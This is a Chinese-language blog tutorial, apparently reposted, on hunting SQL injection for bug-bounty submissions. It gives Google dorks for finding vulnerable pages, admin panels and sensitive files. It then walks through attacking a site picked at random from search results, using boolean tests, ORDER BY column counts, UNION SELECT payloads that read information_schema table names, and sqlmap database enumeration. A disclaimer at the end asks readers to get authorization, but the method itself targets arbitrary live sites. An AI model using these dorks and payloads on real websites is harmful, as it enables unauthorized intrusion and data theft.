当前位置:   article > 正文

超级干货!如何挖公益SRC实战/SQL注入_怎么挖sql注入src

怎么挖sql注入src

目录

一、信息收集

二、实战演示

三、使用sqlmap进行验证

四、总结


一、信息收集

1.查找带有ID传参的网站(可以查找sql注入漏洞
inurl:asp id=xx
2.查找网站后台(多数有登陆框,可以查找弱口令,暴力破解等漏洞)
site:http://xxxx.com “admin”
site:http://xx.com intext:管理
site:http://xx.com inurl:login
site:http://xx.com intitle:后台
3.查看上传漏洞
site:http://xx.com inurl:file
site:http://xx.com inurl:load
4.查找敏感文件
filetype:mdb|doc|xlsx|pdf

二、实战演示

1.谷歌语法搜索
inurl:php id=62
 

图片


随便点进一个带有id传参=62的网站,大概率存在SQL注入
 

图片


2.判断是否存在SQL注入漏洞,显示页面正常
id=62 and 1=1

图片


3.id=62 and 1=1显示页面不正常,已经肯定存在SQL注入
 

图片


4.查找列数
id=62 order by 10
发现列数是10
 

图片


5.查看回显点
id=111111 union select 1,2,3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database() limit 0,1-- qwe

图片

6.输出表名
id=111111 union select 1,2,3,4,5,6,table_name,8,9,10 from information_schema.tables where table_schema=database() limit 0,1-- qwe

图片

三、使用sqlmap进行验证

使用sqlmap命令查看库名
sqlmap.py -u url --dbs

图片

图片

四、总结

1.谷歌语法找到注入点
2.判断注入是否存在
3.查找列数
4.查找表名
5.使用sqlmap进行验证
第一次投稿,觉得这次实战记录很适合新手小白挖SRC,希望多多支持!

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

图片

没看够~?欢迎关注!

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小惠珠哦/article/detail/891738
推荐阅读
相关标签
  

闽ICP备14008679号